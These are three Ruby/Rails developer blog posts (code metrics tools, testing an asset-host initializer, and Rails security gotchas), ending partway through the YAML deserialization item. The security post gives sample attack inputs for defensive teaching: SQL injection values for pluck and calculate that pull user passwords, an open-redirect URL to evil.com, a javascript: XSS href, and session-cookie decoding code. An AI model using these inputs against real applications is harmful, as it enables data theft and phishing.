
Ruby has a rich ecosystem of code metrics tools, readily available and easy to run on your codebase. Though generating the metrics is simple, interpreting them is complex. This article looks at some Ruby metrics, how they are calculated, what they mean and (most importantly) what to do about them, if anything.

Code metrics fall into two categories: static analysis and dynamic analysis. Static analysis is performed without executing the code (or tests). Dynamic analysis, on the other hand, requires executing the code being measured. Test coverage is a form of dynamic analysis because it requires running the test suite. We’ll look at both types of metrics.

By the way, if you’d rather not worry about the nitty-gritty details of the individual code metrics below, give Code Climate a try. We’ve selected the most important metrics to care about and did all the hard work to get you actionable data about your project within minutes.

Lines of Code

One of the oldest and most rudimentary forms of static analysis is lines of code (LOC). This is most commonly defined as the count of non-blank, non-comment lines of source code. LOC can be looked at on a file-by-file basis or aggregated by module, architecture layer (e.g. the models in an MVC app) or by production code vs. test code.

Rails provides LOC metrics broken down by MVC layer and production code vs. tests via the rake stats command. The output looks something like this:
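Here’s an illustrative report for a small app (the numbers are made up, but the layout matches what rake stats prints):

```
+----------------------+-------+-------+---------+---------+-----+-------+
| Name                 | Lines |   LOC | Classes | Methods | M/C | LOC/M |
+----------------------+-------+-------+---------+---------+-----+-------+
| Controllers          |   240 |   189 |       7 |      24 |   3 |     5 |
| Models               |   430 |   343 |      12 |      45 |   3 |     5 |
| Helpers              |    59 |    48 |       0 |       8 |   0 |     4 |
| Model specs          |   510 |   404 |       0 |       0 |   0 |     0 |
| Controller specs     |   393 |   310 |       0 |       0 |   0 |     0 |
+----------------------+-------+-------+---------+---------+-----+-------+
| Total                |  1632 |  1294 |      19 |      77 |   4 |    14 |
+----------------------+-------+-------+---------+---------+-----+-------+
  Code LOC: 580     Test LOC: 714     Code to Test Ratio: 1:1.2
```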

Lines of code alone can’t tell you much, but it’s usually considered in two ways: overall codebase size and test-to-code ratio. Large, monolithic apps will naturally have higher LOC. Test-to-code ratio can give a programmer a crude sense of the testing practices that have been applied.

Because they are so high level and abstract, don’t try to “address” LOC-based metrics directly. Instead, focus on improvements to maintainability (e.g. decomposing an app into services when appropriate, applying TDD) and it will eventually show up in the metrics.


Complexity

Broadly defined, “complexity” metrics take many forms:

  • Cyclomatic complexity — Also known as McCabe’s complexity, after its inventor Thomas McCabe, cyclomatic complexity is a count of the linearly independent paths through source code. While his original paper contains a lot of graph-theory analysis, McCabe noted that cyclomatic complexity “is designed to conform to our intuitive notion of complexity”.
  • The ABC metric — Aggregates the number of assignments, branches and conditionals in a unit of code. The branches portion of an ABC score is very similar to cyclomatic complexity. The metric was designed to be language and style agnostic, which means you could theoretically compare the ABC scores of very different codebases (one in Java and one in Ruby for example).
  • Ruby’s Flog scores — Perhaps the most popular way to describe the complexity of Ruby code. While Flog incorporates ABC analysis, it is, unlike the ABC metric, opinionated and language-specific. For example, Flog penalizes hard-to-understand Ruby constructs like meta-programming.
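To make the cyclomatic count concrete, here’s a small hypothetical method annotated with its decision points; cyclomatic complexity is the number of decision points plus one:

```ruby
# Hypothetical example: each branch point adds one to McCabe's count.
def shipping_cost(order)
  return 0 if order[:total] > 100   # decision point 1
  if order[:express]                # decision point 2
    15
  elsif order[:international]       # decision point 3
    25
  else
    5
  end
end

# Three decision points => cyclomatic complexity of 4,
# one for each linearly independent path through the method.
```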

For my money, Flog scores seem to do the best job of being a proxy for how easy or difficult a block of Ruby code is to understand. Let’s take a look at how it’s computed for a simple method, based on an example from the Flog website:

def blah         # 11.2 total =
 a = eval "1+1" # 1.2 (a=) + 6.0 (eval) +

 if a == 2      # 1.2 (if) + 1.2 (==) + 0.4 (fixnum) +
   puts "yay"   # 1.2 (puts)
 end
end

To use Flog on your own code, first install it:

$ gem install flog

Then you can Flog individual files or whole directories. By default, Flog scores are broken out by method, but you can get per-class totals by running it with the -g option (group by class):

$ flog app/models/user.rb
$ flog -g app/controllers

All of this raises a question: What’s a good Flog score? It’s subjective, of course, but Jake Scruggs, one of the original authors of Metric-Fu, suggested that scores above 20 indicate the method may need refactoring, and above 60 is dangerous. Similarly, Code Climate will flag methods with scores above 25, and considers anything above 60 “very complex”. Fun fact: The highest Flog score ever seen on Code Climate for a single method is 11,354.

If you’d like to get a better sense for Flog scores, take a look at complex classes in some open source projects on Code Climate. Below, for example, is a pretty complex method inside an open source project:

[Screenshot: Complex Method]

Like most code smells, high complexity is a pointer to a deeper problem rather than a problem in-and-of itself. Tread carefully in your refactorings. Often the simplest solutions (e.g. applying Extract Method) are not the best and may actually make things worse; sometimes rethinking your domain model is required.

Duplication

Static analysis can also identify identical and similar code, which usually results from copying and pasting. In Ruby, Flay is the most popular tool for duplication detection. It hunts for large, identical syntax trees and also uses fuzzy matching to detect code which differs only by the specific identifiers and constants used.

Let’s take a look at an example of two similar, but not-quite-identical Ruby snippets:

# From app/models/tickets/lighthouse.rb:
def build_request(path, body)
 Post.new(path).tap do |req|
   req["X-LighthouseToken"] = @token
   req.body = body
 end
end

# From app/models/tickets/pivotal_tracker.rb:
def build_request(path, body)
 Post.new(path).tap do |req|
   req["X-TrackerToken"] = @token
   req.body = body
 end
end

The s-expressions produced by RubyParser for these methods are nearly identical, sans the string literal for the token header name, so Flay reports these as:

1) Similar code found in :defn (mass = 78)
 ./app/models/tickets/lighthouse.rb:25
 ./app/models/tickets/pivotal_tracker.rb:25

Running Flay against your project is simple:

$ gem install flay
$ flay path/to/rails_app

Some duplications reported by Flay should not be addressed. Identical code is generally worse than similar code, of course, but you also have to consider the context. Remember, the real definition of the Don’t Repeat Yourself (DRY) principle is:

Every piece of knowledge must have a single, unambiguous, authoritative representation within a system.

And not:

Don’t type the same characters into the keyboard multiple times.

Simple Rails controllers that follow the REST convention will be similar and show up in Flay reports, but they’re better left damp than DRYed up with a harder-to-understand meta-programmed base class. Remember, code that is too DRY can chafe, and that’s uncomfortable for everyone.

Test Coverage

One of the most popular code metrics is test coverage. Because it requires running the test suite, it’s actually dynamic analysis rather than static analysis. Coverage is often expressed as a percentage, as in: “The test coverage for our Rails app is 83%.”

Test coverage metrics come in three flavors:

  • C0 coverage — The percentage of lines of code that have been executed.
  • C1 coverage — The percentage of branches that have been followed at least once.
  • C2 coverage — The percentage of unique paths through the source code that have been followed.

C0 coverage is by far the most commonly used metric in Ruby. Low test coverage can tell you that your code is untested, but a high test coverage metric doesn’t guarantee that your tests are thorough. For example, you could theoretically achieve 100% C0 coverage with a single test that contains no assertions.
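As a sketch of that failure mode, the following hypothetical “test” executes every line of the method (100% C0 coverage, and even both branches) while verifying nothing about its behavior:

```ruby
def discount(total)
  total > 100 ? total * 0.9 : total
end

# Calls both branches, so line coverage is 100%...
# ...but with no assertions, a broken discount would still "pass".
def test_discount_coverage_only
  discount(150)
  discount(50)
end

test_discount_coverage_only
```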

To calculate the test coverage for your Ruby 1.9 app, use SimpleCov. It takes a couple of steps to set up, but the documentation is solid so I won’t repeat it here.

So what’s a good test coverage percentage? It’s been hotly debated. Some, like Robert Martin, argue that 100% test coverage is a natural side effect of proper development practices, and therefore a bare minimum indicator of quality. DHH put forth an opposing view likening code coverage to security theater and expressly discouraged aiming for 100% code coverage.

Ultimately you need to use your judgement to make a decision that’s right for your team. Different projects with different developers might have different optimal test coverage levels throughout their evolution (even if they are not looking at the metric at all). Tune your sensors to detect pain from under-testing or over-testing and adjust your practices based on pain you’re experiencing.

Suppose that you find yourself with low coverage and are feeling pain as a result. Maybe deploys are breaking the production website every so often. What should you do then? Whole books have been written on this subject, but there are a few tips I’d suggest as a starting point:

  1. Test drive new code.
  2. Don’t backfill unit tests onto non-TDD’ed code. You lose out on the primary benefits of TDD: design assistance. Worse, you can easily end up cementing a poor object design in place.
  3. Start with high level tests (e.g. acceptance tests) to provide confidence the system as a whole doesn’t break as you refactor its guts.
  4. Write failing tests for bugs before fixing them to protect against regressions. Never fix the same bug twice.

Churn

Churn looks at your source code from a different dimension: the change of your source files over time. I like to express it as a count of the number of times a class has been modified in your version control history. For example: “The User class has a churn of 173.”
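Metrics gems aside, a crude per-file churn count can be pulled straight from version control; this sketch assumes Git, and the path is just an example:

```shell
# Number of commits that touched a file — a rough churn measure
$ git log --oneline -- app/models/user.rb | wc -l
```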

By itself, Churn can’t tell you much, but it’s powerful if you mix it with another metric like complexity. Turbulence is a Gem that does just that for Ruby projects. It’s quite easy to use:

$ gem install turbulence
$ cd path/to/rails_app && bule

This will spit out a nice report in turbulence/turbulence.html. Here’s an example:

[Chart: Churn vs Complexity]

Depending on its complexity and churn, classes fall into one of four quadrants:

  1. Upper-right — Classes with high complexity and high churn. These are good top priorities for refactoring because their maintainability issues are impacting the developers on a regular basis.
  2. Upper-left — Classes with high complexity and low churn. An adapter to hook into a complex third-party system may end up here. It’s complicated, but if no one has to work on (or debug) that code, it’s probably worth leaving as-is for now.
  3. Lower-left — Classes with low churn and low complexity. The best type of classes to have. Most of your code should be in this quadrant.
  4. Lower-right — Classes with low complexity and high churn. Configuration definitions are a prototypical example. Done right, there’s not much to refactor here at all.

Wrapping Up

Ruby is blessed with a rich ecosystem of code metrics tools, and the gems we looked at today just scratch the surface. Generally, the tools are easy to get started with, so it’s worth trying them out and getting a feel for how they match up (or don’t) with your sense of code quality. Use the metrics that prove meaningful to you.

Keep in mind that while these metrics contain a treasure trove of information, they represent only a moment in time. They can tell you where you stand, but less about how you got there and where you’re going. Part of the reason why I built Code Climate is to address this shortcoming. Code Climate allows you to track progress in a meaningful way, raising visibility within your team:

[Screenshot: Quality GPA]

If you’d like to try out code quality metrics on your project quickly and easily, give Code Climate a try. There’s a free two week trial, and I’d love to hear your feedback on how it affects your development process.

There’s a lot our code can tell us about the software development work we are doing. There will always be the need for our own judgement as to how our systems should be constructed, and where risky areas reside, but I hope I’ve shown you how metrics can be a great start to the conversation.

Rails prides itself on sane defaults, but also provides hooks for customizing the framework by providing Ruby blocks in your configuration files. Most of this code begins and ends its life simply and innocuously. Sometimes, however, it grows. Maybe it’s only 3 or 4 lines, but chances are they define important behavior.

Pretty soon, you’re going to want some tests. But while testing models and controllers is a well-established practice, how do you test code that’s tucked away in an initializer? Is there such thing as an initializer test?

No, not really. But that’s ok. Configuration or DSL-style code can trick us into forgetting that we have the full arsenal of Ruby and OO practices at our disposal. Let’s take a look at a common idiom found in initialization code and how we might write a test for it.

Configuring Asset Hosts

Asset host configuration often starts as a simple String:

config.action_controller.asset_host = "assets.example.com"

Eventually, as the security and performance needs of your site change, it may grow to:

config.action_controller.asset_host = Proc.new do |*args|
 source, request = args

 if request.try(:ssl?)
   'ssl.cdn.example.com'
 else
   'cdn%d.example.com' % (source.hash % 4)
 end
end

Rails accepts an asset host Proc which takes two arguments – the path to the source file and, when available, the request object – and returns a computed asset host. What we really want to test here is not the assignment of our Proc to a variable, but the logic inside the Proc. If we isolate it, it’s going to make our lives a bit easier.

Since Rails seems to want a Proc for the asset host, we can provide one. Instead of embedding it in an environment file, we can return one from a method inside an object:

class AssetHosts
 def configuration
   Proc.new do |*args|
     source, request = args

     if request.try(:ssl?)
       'ssl.cdn.example.com'
     else
       'cdn%d.example.com' % (source.hash % 4)
     end
   end
 end
end

It’s the exact same code inside the #configuration method, but now we have an object we can test and refactor. To use it, simply assign it to the asset_host config variable as before:

config.action_controller.asset_host = AssetHosts.new.configuration

At this point you may see an opportunity to leverage Ruby’s duck typing, and eliminate the explicit Proc entirely, instead providing an AssetHosts#call method directly. Let’s see how that would work:

class AssetHosts
 def call(source, request = nil)
   if request.try(:ssl?)
     'ssl.cdn.example.com'
   else
     'cdn%d.example.com' % (source.hash % 4)
   end
 end
end

Since Rails just expects that the object you provide for asset_host respond to the #call interface (like Proc itself does), you can simplify the configuration:

config.action_controller.asset_host = AssetHosts.new

Now let’s wrap some tests around AssetHosts. Here’s a first cut:

describe AssetHosts do
 describe "#call" do
   let(:https_request) { double(ssl?: true) }
   let(:http_request)  { double(ssl?: false) }

   context "HTTPS" do
     it "returns the SSL CDN asset host" do
       AssetHosts.new.call("image.png", https_request).
         should == "ssl.cdn.example.com"
     end
   end

   context "HTTP" do
     it "balances asset hosts between 0 - 3" do
       asset_hosts = AssetHosts.new
       asset_hosts.call("foo.png", http_request).
         should == "cdn1.example.com"

       asset_hosts.call("bar.png", http_request).
         should == "cdn2.example.com"
     end
   end

   context "no request" do
     it "returns the non-ssl asset host" do
       AssetHosts.new.call("image.png").
         should == "cdn0.example.com"
     end
   end
 end
end

It’s not magic, but the beauty of first-class objects is that they have room to breathe and help surface refactorings. In this case, you can apply the Composed Method pattern to AssetHosts#call.

Guided by tests, you might end up with an object that looks like this:

class AssetHosts
 def call(source, request = nil)
   if request.try(:ssl?)
     https_asset_host
   else
     http_asset_host(source)
   end
 end

private

 def http_asset_host(source)
   'cdn%d.example.com' % cdn_number(source)
 end

 def https_asset_host
   'ssl.cdn.example.com'
 end

 def cdn_number(source)
   source.hash % 4
 end
end

Since the external behavior of AssetHosts hasn’t changed, no changes to the tests are required.

By making a small leap – isolating configuration code into an object – we now have logic that is easier to test, read, and change. If you find yourself stuck in a similar situation, with important logic stuck in a place that resists testing, see where a similar leap can lead you.

13 Security Gotchas You Should Know About

Secure defaults are critical to building secure systems. If a developer must take explicit action to enforce secure behavior, eventually even an experienced developer will forget to do so. For this reason, security experts say:

“Insecure by default is insecure.”

Rails’ reputation as a relatively secure Web framework is well deserved. Out-of-the-box, there is protection against many common attacks: cross site scripting (XSS), cross site request forgery (CSRF) and SQL injection. Core members are knowledgeable and genuinely concerned with security.

However, there are places where the default behavior could be more secure. This post explores potential security issues in Rails 3 that are fixed in Rails 4, as well as some that are still risky. I hope this post will help you secure your own apps, as well as inspire changes to Rails itself.

Rails 3 Issues

Let’s begin by looking at some Rails 3 issues that are resolved in master. The Rails team deserves credit for addressing these, but they are worth noting since many applications will be running on Rails 2 and 3 for years to come.

1. CSRF via Leaky #match Routes

Here is an example taken directly from the Rails 3 generated config/routes.rb file:

WebStore::Application.routes.draw do
 # Sample of named route:
 match 'products/:id/purchase' => 'catalog#purchase',
   :as => :purchase
 # This route can be invoked with
 # purchase_url(:id => product.id)
end

This has the effect of routing the /products/:id/purchase path to the CatalogController#purchase method for all HTTP verbs (GET, POST, etc). The problem is that Rails’ cross site request forgery (CSRF) protection does not apply to GET requests. You can see this in the method to enforce CSRF protection:

def verified_request?
 !protect_against_forgery? ||
 request.get? ||
 form_authenticity_token ==
   params[request_forgery_protection_token] ||
 form_authenticity_token ==
   request.headers['X-CSRF-Token']
end

The second line short-circuits the CSRF check: it means that if request.get? is true, the request is considered “verified” and the CSRF check is skipped. In fact, in the Rails source there is a comment above this method that says:

Gets should be safe and idempotent.

In your application, you may always use POST to make requests to /products/:id/purchase. But because the router allows GET requests as well, an attacker can trivially bypass the CSRF protection for any method routed via the #match helper. If your application uses the old wildcard route (not recommended), the CSRF protection is completely ineffective.

Best Practice: Don’t use GET for unsafe actions. Don’t use #match to add routes (use #post, #put, etc. instead). Ensure you don’t have wildcard routes.
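Applied to the route above, the safer declaration names the verb explicitly (a sketch reusing the same sample names):

```ruby
WebStore::Application.routes.draw do
  # Only POST reaches CatalogController#purchase; GET requests no longer
  # route here, so the CSRF check cannot be short-circuited.
  post 'products/:id/purchase' => 'catalog#purchase', :as => :purchase
end
```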

The Fix: Rails now requires you to specify either specific HTTP verbs or via: :all when adding routes with #match. The generated config/routes.rb no longer contains commented-out #match routes. (The wildcard route is also removed.)

2. Regular Expression Anchors in Format Validations

Consider the following validation:

validates_format_of :name, with: /^[a-z ]+$/i

This code is usually a subtle bug. The developer probably meant to enforce that the entire name attribute is composed of only letters and spaces. Instead, this will only enforce that at least one line in the name is composed of letters and spaces. Some examples of regular expression matching make it more clear:

>> /^[a-z ]+$/i =~ "Joe User"
=> 0 # Match

>> /^[a-z ]+$/i =~ " '); -- foo"
=> nil # No match

>> /^[a-z ]+$/i =~ "a\n '); -- foo"
=> 0 # Match

The developer should have used the \A (beginning of string) and \z (end of string) anchors instead of ^ (beginning of line) and $ (end of line). The correct code would be:

validates_format_of :name, with: /\A[a-z ]+\z/i
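Re-running the earlier matches against the corrected pattern shows the multiline payload is now rejected:

```ruby
/\A[a-z ]+\z/i =~ "Joe User"       # => 0   (match)
/\A[a-z ]+\z/i =~ "a\n '); -- foo" # => nil (no match, unlike ^...$)
```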

You could argue that the developer is at fault, and you’d be right. However, the behavior of regular expression anchors is not necessarily obvious, especially to developers who are not considering multiline values. (Perhaps the attribute is only exposed in a text input field, never a textarea.)

Rails is at the right place in the stack to save developers from themselves and that’s exactly what has been done in Rails 4.

Best Practice: Whenever possible, use \A and \z to anchor regular expressions instead of ^ and $.

The Fix: Rails 4 introduces a multiline option for validates_format_of. If your regular expression is anchored using ^ and $ rather than \A and \z and you do not pass multiline: true, Rails will raise an exception. This is a great example of creating safer default behavior, while still providing control to override it where necessary.

3. Clickjacking

Clickjacking or “UI redress attacks” involve rendering the target site in an invisible frame, and tricking a victim to take an unexpected action when they click. If a site is vulnerable to clickjacking, an attacker may trick users into taking undesired actions like making a one-click purchase, following someone on Twitter, or changing their privacy settings.

To defend against clickjacking attacks, a site must prevent itself from being rendered in a frame or iframe on sites that it does not control. Older browsers required ugly “frame busting” JavaScripts, but modern browsers support the X-Frame-Options HTTP header which instructs the browser about whether or not it should allow the site to be framed. This header is easy to include, and not likely to break most websites, so Rails should include it by default.

Best Practice: Use the secure_headers RubyGem by Twitter to add an X-Frame-Options header with the value of SAMEORIGIN or DENY.
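If you’d rather not pull in a gem, the header can also be set by a tiny Rack middleware. This is a hand-rolled sketch, not the secure_headers API:

```ruby
# Minimal Rack middleware that adds X-Frame-Options to every response.
class FrameOptions
  def initialize(app, value = "SAMEORIGIN")
    @app = app
    @value = value
  end

  def call(env)
    status, headers, body = @app.call(env)
    headers["X-Frame-Options"] ||= @value # don't clobber an explicit value
    [status, headers, body]
  end
end

# In config/application.rb (hypothetical placement):
#   config.middleware.use FrameOptions
```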

The Fix: By default, Rails 4 now sends the X-Frame-Options header with the value of SAMEORIGIN:

X-Frame-Options: SAMEORIGIN

This tells the browser that your application can only be framed by pages originating from the same domain.

4. User-Readable Sessions

The default Rails 3 session store uses signed, unencrypted cookies. While this protects the session from tampering, it is trivial for an attacker to decode the contents of a session cookie:

session_cookie = <<-STR.strip.gsub(/\n/, '')
BAh7CEkiD3Nlc3Npb25faWQGOgZFRkkiJTkwYThmZmQ3Zm
dAY7AEZJIgtzZWtyaXQGO…--4c50026d340abf222…
STR

Marshal.load(Base64.decode64(session_cookie.split("--")[0]))
# => {
#   "session_id"  => "90a8f...",
#   "_csrf_token" => "iUoXA...",
#   "secret"      => "sekrit"
# }

It’s unsafe to store any sensitive information in the session. Hopefully this is well known, but even if a user’s session does not contain sensitive data, it can still create risk. By decoding the session data, an attacker can gain useful information about the internals of the application that can be leveraged in an attack. For example, it may be possible to understand which authentication system is in use (Authlogic, Devise, etc.).

While this does not create a vulnerability on its own, it can aid attackers. Any information about how the application works can be used to hone exploits, and in some cases to avoid triggering exceptions or tripwires that could give the developer an early warning an attack is underway.

User-readable sessions violate the Principle of Least Privilege, because even though the session data must be passed to the visitor’s browser, the visitor does not need to be able to read the data.

Best Practice: Don’t put any information into the session that you wouldn’t want an attacker to have access to.

The Fix: Rails 4 changed the default session store to be encrypted. Users can no longer decode the contents of the session without the decryption key, which is not available on the client side.

Unresolved Issues

The remainder of this post covers security risks that are still present in Rails at the time of publication. Hopefully at least some of these will be fixed, and I will update this post if that is the case.

1. Verbose Server Headers

The default Rails server is WEBrick (part of the Ruby standard library), even though it is rare to run WEBrick in production. By default, WEBrick returns a verbose Server header with every HTTP response:

HTTP/1.1 200 OK
# …
Server: WEBrick/1.3.1 (Ruby/1.9.3/2012-04-20)

Looking at the WEBrick source, you can see the header is composed with a few key pieces of information:

"WEBrick/#{WEBrick::VERSION} " +
"(Ruby/#{RUBY_VERSION}/#{RUBY_RELEASE_DATE})",

This exposes the WEBrick version, and also the specific Ruby patchlevel being run (since release dates map to patchlevels). With this information, spray-and-pray scanners can target your server more effectively, and attackers can tailor their attack payloads.

Best Practice: Avoid running WEBrick in production. There are better servers out there like Passenger, Unicorn, Thin and Puma.

The Fix: While this issue originates in the WEBrick source, Rails should configure WEBrick to use a less verbose Server header. Simply “Ruby” seems like a good choice.

2. Binding to 0.0.0.0

If you boot a Rails server, you’ll see something like this:

$ ./script/rails server -e production
=> Booting WEBrick
=> Rails 3.2.12 application starting in production on http://0.0.0.0:3000

Rails is binding on 0.0.0.0 (all network interfaces) instead of 127.0.0.1 (local interface only). This can create security risk in both development and production contexts.

In development mode, Rails is not as secure (for example, it renders diagnostic 500 pages). Additionally, developers may load a mix of production data and testing data (e.g. username: admin / password: admin). Scanning for web servers on port 3000 in a San Francisco coffee shop would probably yield good targets.

In production, Rails should be run behind a proxy. Without a proxy, IP spoofing attacks are trivial. But if Rails binds on 0.0.0.0, it may be possible to easily circumvent a proxy by hitting Rails directly depending on the deployment configuration.

Therefore, binding to 127.0.0.1 is a safer default than 0.0.0.0 in all Rails environments.

Best Practice: Ensure your Web server process is binding on the minimal set of interfaces in production. Avoid loading production data on your laptop for debugging purposes. If you must do so, load a minimal dataset and remove it as soon as it’s no longer necessary.

The Fix: Rails already provides a --binding option to change the IP address that the server listens on. The default should be changed from 0.0.0.0 to 127.0.0.1. Developers who need to bind to other interfaces in production can make that change in their deployment configurations.

3. Versioned Secret Tokens

Every Rails app gets a long, randomly-generated secret token in config/initializers/secret_token.rb when it is created with rails new. It looks something like this:

WebStore::Application.config.secret_token = '4f06a7a…72489780f'

Since Rails creates this automatically, most developers do not think about it much. But this secret token is like a root key for your application. If you have the secret token, it is trivial to forge sessions and escalate privileges. It is one of the most critical pieces of sensitive data to protect. Encryption is only as good as your key management practices.

Unfortunately, Rails falls flat in dealing with this secret token. The secret_token.rb file ends up checked into version control, and copied to GitHub, CI servers and every developer’s laptop.

Best Practice: Use a different secret token in each environment. Inject it via an ENV var into the application. As an alternative, symlink the production secret token in during deployment.
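As a sketch of the ENV var approach (the variable name SECRET_TOKEN is arbitrary):

```ruby
# config/initializers/secret_token.rb — no secret checked into version control
WebStore::Application.config.secret_token = ENV.fetch("SECRET_TOKEN")
```

ENV.fetch fails fast with a KeyError if the variable is missing, which beats silently booting with a nil secret.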

The Fix: At a minimum, Rails should .gitignore the config/initializers/secret_token.rb file by default. Developers can symlink a production token in place when they deploy or change the initializer to use an ENV var (on e.g. Heroku).

I would go further and propose that Rails create a storage mechanism for secrets. There are many libraries that provide installation instructions involving checking secrets into initializers, which is a bad practice. At the same time, there are at least two popular strategies for dealing with this issue: ENV vars and symlinked initializers.

Rails is in the right place to provide a simple API that developers can depend on for managing secrets, with a swappable backend (like the cache store and session store).

4. Logging Values in SQL Statements

The config.filter_parameters option Rails provides is a useful way to prevent sensitive information like passwords from accumulating in production log files. But it does not affect logging of values in SQL statements:

Started POST "/users" for 127.0.0.1 at 2013-03-12 14:26:28 -0400
Processing by UsersController#create as HTML
 Parameters: {"utf8"=>"✓", "authenticity_token"=>"...",
 "user"=>{"name"=>"Name", "password"=>"[FILTERED]"}, "commit"=>"Create User"}
 SQL (7.2ms)  INSERT INTO "users" ("created_at", "name", "password_digest",
 "updated_at") VALUES (?, ?, ?, ?)  [["created_at",
 Tue, 12 Mar 2013 18:26:28 UTC +00:00], ["name", "Name"], ["password_digest",
 "$2a$10$r/XGSY9zJr62IpedC1m4Jes8slRRNn8tkikn5.0kE2izKNMlPsqvC"], ["updated_at",
 Tue, 12 Mar 2013 18:26:28 UTC +00:00]]
Completed 302 Found in 91ms (ActiveRecord: 8.8ms)

The default Rails logging level in production mode (info) will not log SQL statements. The risk here is that sometimes developers will temporarily increase the logging level in production when debugging. During those periods, the application may write sensitive data to log files, which then persist on the server for a long time. An attacker who gains access to read files on the server could find the data with a simple grep.

Best Practice: Be aware of what is being logged at your production log level. If you increase the log level temporarily, causing sensitive data to be logged, remove that data as soon as it’s no longer needed.

The Fix: Rails could change the config.filter_parameters option into something like config.filter_logs, and apply it to both parameters and SQL statements. It may not be possible to properly filter SQL statements in all cases (as it would require a SQL parser) but there may be an 80/20 solution that could work for standard inserts and updates.

As an alternative, Rails could redact the entire SQL statement if it contains references to the filtered values (for example, redact all statements containing “password”), at least in production mode.

5. Offsite Redirects

Many applications contain a controller action that needs to send users to a different location depending on the context. The most common example is a SessionsController that directs the newly authenticated user to their intended destination or a default destination:

class SessionsController < ApplicationController
 def create
   # ...
   if params[:destination].present?
     redirect_to params[:destination]
   else
     redirect_to dashboard_path
   end
 end
end

This creates the risk that an attacker can construct a URL that will cause an unsuspecting user to be sent to a malicious site after they login:

https://example.com/sessions/new?destination=http://evil.com/

Unvalidated redirects can be used for phishing or may damage the user’s trust in you, because it appears that you sent them to a malicious website. Even a vigilant user may not check the URL bar to ensure they are not being phished after their first page load. The issue is serious enough that it has made it into the latest edition of the OWASP Top Ten Application Security Threats.

Best Practice: When passing a hash to #redirect_to, use the only_path: true option to limit the redirect to the current host:

redirect_to params.merge(only_path: true)

When passing a string, you can parse it and extract the path:

redirect_to URI.parse(params[:destination]).path
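This works because parsing discards the scheme and host, so even a fully qualified attacker-supplied URL collapses to a local path (note that any query string is dropped as well):

```ruby
require "uri"

# An absolute URL pointing at another host is reduced to its path component
URI.parse("http://evil.com/dashboard").path  # => "/dashboard"

# A plain relative path stays a local path
URI.parse("/dashboard?tab=all").path         # => "/dashboard"
```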

The Fix: By default, Rails should only allow redirects within the same domain (or a whitelist). For the rare cases where external redirects are intended, the developer should be required to pass an external: true option to redirect_to in order to opt-in to the more risky behavior.

6. Cross Site Scripting (XSS) Via link_to

Many developers don’t realize that the HREF attribute of the link_to helper can be used to inject JavaScript. Here is an example of unsafe code:

<%= link_to "Homepage", user.homepage_url %>

Assuming the user can set the value of their homepage_url by updating their profile, this creates the risk of XSS. This value:

user.homepage_url = "javascript:alert('hello')"

Will generate this HTML:

<a href="javascript:alert('hello')">Homepage</a>

Clicking the link will execute the script provided by the attacker. Rails’ XSS protection will not prevent this. javascript: links used to be necessary and common before the community migrated to more unobtrusive JavaScript techniques, but they are now a vestigial weakness.

Best Practice: Avoid using untrusted input in HREFs. When you must allow the user to control the HREF, run the input through URI.parse first and sanity check the protocol and host.
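A sanity check along those lines might look like the following. Here, safe_href and SAFE_SCHEMES are hypothetical helper names, not part of Rails:

```ruby
require "uri"

# Schemes we consider safe; nil covers relative paths like "/profile".
SAFE_SCHEMES = [nil, "http", "https", "mailto"].freeze

# Return the URL only if its scheme is absent or explicitly allowed;
# otherwise fall back to a harmless placeholder.
def safe_href(url)
  uri = URI.parse(url)
  SAFE_SCHEMES.include?(uri.scheme&.downcase) ? url : "#"
rescue URI::InvalidURIError
  "#"
end
```

With this in place, `link_to "Homepage", safe_href(user.homepage_url)` renders a dead link instead of an executable one when the stored value uses the javascript: scheme.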

The Fix: Rails should only allow paths, HTTP, HTTPS and mailto: href values in the link_to helper by default. Developers should have to opt-in to unsafe behavior by passing in an option to the link_to helper, or link_to could simply not support this and developers can craft their links by hand.

7. SQL Injection

Rails does a relatively good job of preventing common SQL injection (SQLi) attacks, so developers may think that Rails is immune to SQLi. Of course, that is not the case. Suppose a developer needs to pull either subtotals or totals off the orders table, based on a parameter. They might write:

Order.pluck(params[:column])

This is not a safe thing to do. Clearly, the user can now manipulate the application to retrieve any column of data from the orders table that they wish. What is less obvious, however, is that the attacker can also pull values from other tables. For example:

params[:column] = "password FROM users--"
Order.pluck(params[:column])

Will become:

SELECT password FROM users-- FROM "orders"

Similarly, the column_name argument to #calculate actually accepts arbitrary SQL:

params[:column] = "age) FROM users WHERE name = 'Bob'; --"
Order.calculate(:sum, params[:column])

Will become:

SELECT SUM(age) FROM users WHERE name = 'Bob'; --) AS sum_id FROM "orders"

Controlling the column_name argument of the #calculate method allows the attacker to pull specific values from arbitrary columns on arbitrary tables.

Rails-SQLi.org details which ActiveRecord methods and options permit SQL, with examples of how they might be attacked.

Best Practice: Understand the APIs you use and where they might permit more dangerous operations than you’d expect. Use the safest APIs possible, and whitelist expected inputs.
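For the #pluck example above, whitelisting can be as simple as the sketch below (order_column and ALLOWED_ORDER_COLUMNS are hypothetical names):

```ruby
# Only a known column name ever reaches the query; anything else is rejected.
ALLOWED_ORDER_COLUMNS = %w(subtotal total).freeze

def order_column(param)
  unless ALLOWED_ORDER_COLUMNS.include?(param)
    raise ArgumentError, "unexpected column: #{param.inspect}"
  end
  param
end
```

The controller would then call something like `Order.pluck(order_column(params[:column]))`, and the payload `"password FROM users--"` raises instead of reaching the database.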

The Fix: This one is difficult to solve en masse, as the proper solution varies by context. In general, ActiveRecord APIs should only permit SQL fragments where they are commonly used. Method parameters named column_name should only accept column names. Alternative APIs can be provided for developers who need more control.

Hat tip to Justin Collins of Twitter for writing rails-sqli.org which made me aware of this issue.

8. YAML Deserialization

As many Ruby developers learned in January, deserializing untrusted data with YAML is as unsafe as eval. There’s been a lot written about YAML-based attacks, so I won’t rehash it here, but in summary if the attacker can inject a YAML payload, they can execute arbitrary code on the server. The application does not need to do anything other than load the YAML in order to be vulnerable.

Although Rails was patched to avoid parsing YAML sent to the server in HTTP requests, it still uses YAML as the default serialization format for the #serialize feature, as well as the new #store feature (which is itself a thin wrapper around #serialize). Risky code looks like this:

class User < ActiveRecord::Base
  # ...
  serialize :preferences

  store :theme, accessors: [ :color, :bgcolor ]
end

Most Rails developers would not feel comfortable storing arbitrary Ruby code in their database and evaling it when the records are loaded, but that’s the functional equivalent of using YAML deserialization in this way. It violates the Principle of Least Privilege whenever the stored data does not actually need to include arbitrary Ruby objects. Suddenly a vulnerability that allows writing a value to the database can be springboarded into taking control of the entire server.

The use of YAML is especially concerning to me as it looks safe but is dangerous. The YAML format was looked at for years by hundreds of skilled developers before the remote code execution (RCE) vulnerability was exposed. While this is top of mind in the Ruby community now, new developers who pick up Rails next year will not have experienced the YAML RCE fiasco.
